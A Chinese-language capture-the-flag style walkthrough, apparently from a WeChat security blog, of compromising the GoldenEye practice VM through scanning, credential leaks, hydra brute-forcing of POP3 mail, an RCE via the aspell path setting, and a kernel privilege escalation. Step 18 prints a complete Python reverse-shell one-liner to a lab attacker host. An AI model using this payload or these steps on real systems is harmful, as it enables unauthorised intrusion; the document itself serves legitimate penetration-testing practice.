前言
欲善其事,必先利其器。学习好渗透最重要的是就是实践,我们可以通过在本地搭建靶场来作为我们的目标。通过对这些靶场的渗透练习,充分理解每个漏洞的原理。
渗透流程
1、在虚拟机上搭建好环境,设置网络为NAT模式后,如下图所示
2、先用arpscan扫一下C段寻找靶机的ip地址
3、找到靶场的IP地址 192.168.131.133
,用nmap扫描端口开放情况
4、发现开放了 25、80、55006、55007
端口,接着去访问80
端口,发现有一个提示目录/sev-home/
是一个登录认证先放着
5、在js
代码处发现一处信息泄露,发现两个用户Boris 和 Natalya以及一个经过html编码的密码InvincibleHack3r
6、通过js找到的账号和密码进行登陆,提示的登录页面发现两个用户都登陆失败。。。试了试小写居然登陆成功了
7、通过登陆成功后提示说开放了一个POP3服务在一个较大的端口上。想到前面端口扫描的55006和55007端口,用hydra爆破一下POP3服务器的密码,爆破出两个账号的密码
8、通过爆破出来的账号和密码登陆POP3服务器,在Natalya账号中发现线索,登陆显示内容有一个用户名和密码以及域名
9、访问域名我们需要在本地hosts文件添加dns解析,按照要求添加好dns解析后访问域名
10、登录前面给出的账号,在massages处看到新线索用户doak
11、接着用hydra爆破邮箱账号doak的密码
12、使用hydra爆破出的密码去登陆doak的邮箱,通过doak登陆显示内容发现了dr_doak用户的账户密码
13、通过dr_doak的账号和密码去网站登录,登陆成功
14、在网站中发现一个用户账号admin 以及一个文件
15、去看看这个图片,在图片的信息中发现了一个base64加密的东西
16、解密之后看着像是一串密码可能是admin的密码,去尝试登录,登陆成功
17、登陆成功之后,去网上搜索相关漏洞,发现有RCE
18、在Server中的system_path里的Path to aspell 添加一个python反弹shell的命令,然后添加spell engine如下图所示
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.131.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
19、最后在tags里面调用,如下图
20、反弹成功
21、但是因为是低权限,所以我们考虑提权,查看一下内核,发现是ubuntu 3.13版本的,在kali中搜索提权exp,使用37292.c这个
23、由于靶机上面没有gcc的命令,所以要把提权文件里把gcc改成cc,如下图所示,大约在143行处
24、然后把提权文件上传到靶机,修改文件权限(+x)后运行提权文件
25、最后进入root查看flag,发现没有东西,试试ls -a,原来是隐藏文件,最后拿到flag
团队介绍
点击关注银河护卫队super
原文始发于微信公众号(银河护卫队super):GoldenEye 靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论